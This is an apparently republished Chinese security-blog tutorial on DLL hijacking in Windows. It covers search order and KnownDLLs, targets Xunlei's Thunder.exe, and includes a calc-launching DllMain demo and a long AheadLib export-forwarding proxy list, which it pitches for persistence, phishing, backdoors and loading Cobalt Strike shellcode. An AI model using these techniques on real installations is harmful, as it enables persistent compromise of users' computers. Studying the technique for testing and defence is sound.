DLL Hijacking

渗透技巧 2年前 (2023) admin
330 0 0

Dll Hijacking学习

DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,这种库包含了可由多个程序同时使用的代码和数据,即DLL文件。

DLL Hijacking

通过工具procmon可以看到微信的主程序Wechat.exe在启动时加载了许多dll文件

简单点来讲DLL类似于一个独立的程序,其他程序需要的时候就可以调用,而DLL劫持由于挖掘成本低,存活时间较长等原因常被用于权限维持或者钓鱼使用。

DLL加载顺序及变化

Windows XP SP2及其以上版本系统默认dll链接库加载优先规则如下:启用Dll安全模式搜索规则:1.加载应用程序的目录2.系统目录3.16 位系统目录4.Windows目录5.当前目录6.PATH 环境变量中列出的目录

禁用Dll安全模式搜索规则:1.加载应用程序的目录2.当前目录3.系统目录4.16 位系统目录。5.Windows目录6.PATH 环境变量中列出的目录

DLL Hijacking

MSDN中关于DLL加载的相关说明https://learn.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order


Windows 7之后,微软官方为了遏制DLL劫持引入了Know DLLs注册表项,存放一些容易被劫持的DLL,此后程序在调用在此项的DLL文件时不再从EXE自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用

DLL Hijacking


了解上面后大致可以将挖掘DLL劫持分为以下步骤:

1.启动目标EXE文件

2.使用进程监控工具观察EXE启动后会加载的DLL文件

3.找到合适进行劫持的DLL

4.编写DLL文件并放在EXE的同级目录

5.再次启动EXE观察效果

劫持不存在的DLL

通过进程监控可以发现,有些EXE会尝试加载不存在的DLL,并且不影响程序正常执行,可以尝试劫持这些NOT FOUND 的DLL

这里以迅雷为例子

对Thunder.exe进程进行监控

DLL Hijacking


这里编写一个执行弹出计算器的DLL作为演示

STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateProcessA(NULL, // No module name (use command line)
(LPSTR)"calc.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
0, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
(LPSTARTUPINFOA)&si, // Pointer to STARTUPINFO structure
(LPPROCESS_INFORMATION)&pi // Pointer to PROCESS_INFORMATION structure
);
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

将编译好的DLL并放在Thunder.exe的同级目录,名字和要劫持的DLL一致

DLL Hijacking


DLL Hijacking

再次启动EXE发现DLL已经被成功加载

DLL Hijacking

效果如下

DLL Hijacking

劫持存在的DLL

继续使用Procmom进行进程监控,这次筛选RESULT为 SUCCESS的结果

DLL Hijacking

一些情况下程序缺少某个DLL仍然能完成初始化,这种情况下可以直接将的恶意DLL替换原来的DLL

例如通过观察发现Thunder.exe在缺少XLBugHandler.dll的情况下仍然可以启动进程(这个DLL可能负责处理程序错误)

DLL Hijacking

通过重命名恶意DLL可以在程序初始化时跳出弹窗

DLL Hijacking

观察到EXE动态加载此DLL说明可以执行循环任务

DLL Hijacking

例如将shellcode加载至当前进程上线CS

DLL Hijacking

转发DLL

当EXE需要调用某个函数时会去指定的DLL中,转发DLL相当于在二者中起到一个桥梁的作用,非常适用于快速构造后门

DLL Hijacking

                                                                                        DLL转发的原理

在Promom中任意寻找对于Thunder.exe会加载成功的DLL

DLL Hijacking

使用AheadLib直接转发函数

DLL Hijacking

将转发函数内容放在dllmain.cpp中

#pragma comment(linker, "/EXPORT:XML_DefaultCurrent=libexpatOrg.XML_DefaultCurrent,@1")
#pragma comment(linker, "/EXPORT:XML_ErrorString=libexpatOrg.XML_ErrorString,@2")
#pragma comment(linker, "/EXPORT:XML_ExpatVersion=libexpatOrg.XML_ExpatVersion,@3")
#pragma comment(linker, "/EXPORT:XML_ExpatVersionInfo=libexpatOrg.XML_ExpatVersionInfo,@4")
#pragma comment(linker, "/EXPORT:XML_ExternalEntityParserCreate=libexpatOrg.XML_ExternalEntityParserCreate,@5")
#pragma comment(linker, "/EXPORT:XML_GetBase=libexpatOrg.XML_GetBase,@6")
#pragma comment(linker, "/EXPORT:XML_GetBuffer=libexpatOrg.XML_GetBuffer,@7")
#pragma comment(linker, "/EXPORT:XML_GetCurrentByteCount=libexpatOrg.XML_GetCurrentByteCount,@8")
#pragma comment(linker, "/EXPORT:XML_GetCurrentByteIndex=libexpatOrg.XML_GetCurrentByteIndex,@9")
#pragma comment(linker, "/EXPORT:XML_GetCurrentColumnNumber=libexpatOrg.XML_GetCurrentColumnNumber,@10")
#pragma comment(linker, "/EXPORT:XML_GetCurrentLineNumber=libexpatOrg.XML_GetCurrentLineNumber,@11")
#pragma comment(linker, "/EXPORT:XML_GetErrorCode=libexpatOrg.XML_GetErrorCode,@12")
#pragma comment(linker, "/EXPORT:XML_GetIdAttributeIndex=libexpatOrg.XML_GetIdAttributeIndex,@13")
#pragma comment(linker, "/EXPORT:XML_GetInputContext=libexpatOrg.XML_GetInputContext,@14")
#pragma comment(linker, "/EXPORT:XML_GetSpecifiedAttributeCount=libexpatOrg.XML_GetSpecifiedAttributeCount,@15")
#pragma comment(linker, "/EXPORT:XML_Parse=libexpatOrg.XML_Parse,@16")
#pragma comment(linker, "/EXPORT:XML_ParseBuffer=libexpatOrg.XML_ParseBuffer,@17")
#pragma comment(linker, "/EXPORT:XML_ParserCreate=libexpatOrg.XML_ParserCreate,@18")
#pragma comment(linker, "/EXPORT:XML_ParserCreateNS=libexpatOrg.XML_ParserCreateNS,@19")
#pragma comment(linker, "/EXPORT:XML_ParserCreate_MM=libexpatOrg.XML_ParserCreate_MM,@20")
#pragma comment(linker, "/EXPORT:XML_ParserFree=libexpatOrg.XML_ParserFree,@21")
#pragma comment(linker, "/EXPORT:XML_SetAttlistDeclHandler=libexpatOrg.XML_SetAttlistDeclHandler,@22")
#pragma comment(linker, "/EXPORT:XML_SetBase=libexpatOrg.XML_SetBase,@23")
#pragma comment(linker, "/EXPORT:XML_SetCdataSectionHandler=libexpatOrg.XML_SetCdataSectionHandler,@24")
#pragma comment(linker, "/EXPORT:XML_SetCharacterDataHandler=libexpatOrg.XML_SetCharacterDataHandler,@25")
#pragma comment(linker, "/EXPORT:XML_SetCommentHandler=libexpatOrg.XML_SetCommentHandler,@26")
#pragma comment(linker, "/EXPORT:XML_SetDefaultHandler=libexpatOrg.XML_SetDefaultHandler,@27")
#pragma comment(linker, "/EXPORT:XML_SetDefaultHandlerExpand=libexpatOrg.XML_SetDefaultHandlerExpand,@28")
#pragma comment(linker, "/EXPORT:XML_SetDoctypeDeclHandler=libexpatOrg.XML_SetDoctypeDeclHandler,@29")
#pragma comment(linker, "/EXPORT:XML_SetElementDeclHandler=libexpatOrg.XML_SetElementDeclHandler,@30")
#pragma comment(linker, "/EXPORT:XML_SetElementHandler=libexpatOrg.XML_SetElementHandler,@31")
#pragma comment(linker, "/EXPORT:XML_SetEncoding=libexpatOrg.XML_SetEncoding,@32")
#pragma comment(linker, "/EXPORT:XML_SetEndCdataSectionHandler=libexpatOrg.XML_SetEndCdataSectionHandler,@33")
#pragma comment(linker, "/EXPORT:XML_SetEndDoctypeDeclHandler=libexpatOrg.XML_SetEndDoctypeDeclHandler,@34")
#pragma comment(linker, "/EXPORT:XML_SetEndElementHandler=libexpatOrg.XML_SetEndElementHandler,@35")
#pragma comment(linker, "/EXPORT:XML_SetEndNamespaceDeclHandler=libexpatOrg.XML_SetEndNamespaceDeclHandler,@36")
#pragma comment(linker, "/EXPORT:XML_SetEntityDeclHandler=libexpatOrg.XML_SetEntityDeclHandler,@37")
#pragma comment(linker, "/EXPORT:XML_SetExternalEntityRefHandler=libexpatOrg.XML_SetExternalEntityRefHandler,@38")
#pragma comment(linker, "/EXPORT:XML_SetExternalEntityRefHandlerArg=libexpatOrg.XML_SetExternalEntityRefHandlerArg,@39")
#pragma comment(linker, "/EXPORT:XML_SetNamespaceDeclHandler=libexpatOrg.XML_SetNamespaceDeclHandler,@40")
#pragma comment(linker, "/EXPORT:XML_SetNotStandaloneHandler=libexpatOrg.XML_SetNotStandaloneHandler,@41")
#pragma comment(linker, "/EXPORT:XML_SetNotationDeclHandler=libexpatOrg.XML_SetNotationDeclHandler,@42")
#pragma comment(linker, "/EXPORT:XML_SetParamEntityParsing=libexpatOrg.XML_SetParamEntityParsing,@43")
#pragma comment(linker, "/EXPORT:XML_SetProcessingInstructionHandler=libexpatOrg.XML_SetProcessingInstructionHandler,@44")
#pragma comment(linker, "/EXPORT:XML_SetReturnNSTriplet=libexpatOrg.XML_SetReturnNSTriplet,@45")
#pragma comment(linker, "/EXPORT:XML_SetStartCdataSectionHandler=libexpatOrg.XML_SetStartCdataSectionHandler,@46")
#pragma comment(linker, "/EXPORT:XML_SetStartDoctypeDeclHandler=libexpatOrg.XML_SetStartDoctypeDeclHandler,@47")
#pragma comment(linker, "/EXPORT:XML_SetStartElementHandler=libexpatOrg.XML_SetStartElementHandler,@48")
#pragma comment(linker, "/EXPORT:XML_SetStartNamespaceDeclHandler=libexpatOrg.XML_SetStartNamespaceDeclHandler,@49")
#pragma comment(linker, "/EXPORT:XML_SetUnknownEncodingHandler=libexpatOrg.XML_SetUnknownEncodingHandler,@50")
#pragma comment(linker, "/EXPORT:XML_SetUnparsedEntityDeclHandler=libexpatOrg.XML_SetUnparsedEntityDeclHandler,@51")
#pragma comment(linker, "/EXPORT:XML_SetUserData=libexpatOrg.XML_SetUserData,@52")
#pragma comment(linker, "/EXPORT:XML_SetXmlDeclHandler=libexpatOrg.XML_SetXmlDeclHandler,@53")
#pragma comment(linker, "/EXPORT:XML_UseParserAsHandlerArg=libexpatOrg.XML_UseParserAsHandlerArg,@54")
#pragma comment(linker, "/EXPORT:XML_ParserReset=libexpatOrg.XML_ParserReset,@55")
#pragma comment(linker, "/EXPORT:XML_SetSkippedEntityHandler=libexpatOrg.XML_SetSkippedEntityHandler,@56")
#pragma comment(linker, "/EXPORT:XML_GetFeatureList=libexpatOrg.XML_GetFeatureList,@57")
#pragma comment(linker, "/EXPORT:XML_UseForeignDTD=libexpatOrg.XML_UseForeignDTD,@58")
#pragma comment(linker, "/EXPORT:XML_FreeContentModel=libexpatOrg.XML_FreeContentModel,@59")
#pragma comment(linker, "/EXPORT:XML_MemMalloc=libexpatOrg.XML_MemMalloc,@60")
#pragma comment(linker, "/EXPORT:XML_MemRealloc=libexpatOrg.XML_MemRealloc,@61")
#pragma comment(linker, "/EXPORT:XML_MemFree=libexpatOrg.XML_MemFree,@62")
#pragma comment(linker, "/EXPORT:XML_StopParser=libexpatOrg.XML_StopParser,@63")
#pragma comment(linker, "/EXPORT:XML_ResumeParser=libexpatOrg.XML_ResumeParser,@64")
#pragma comment(linker, "/EXPORT:XML_GetParsingStatus=libexpatOrg.XML_GetParsingStatus,@65")

DLL Hijacking

转发效果如下

DLL Hijacking


原文始发于微信公众号(dada安全研究所):DLL Hijacking

版权声明:admin 发表于 2023年2月21日 下午1:22。
转载请注明:DLL Hijacking | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...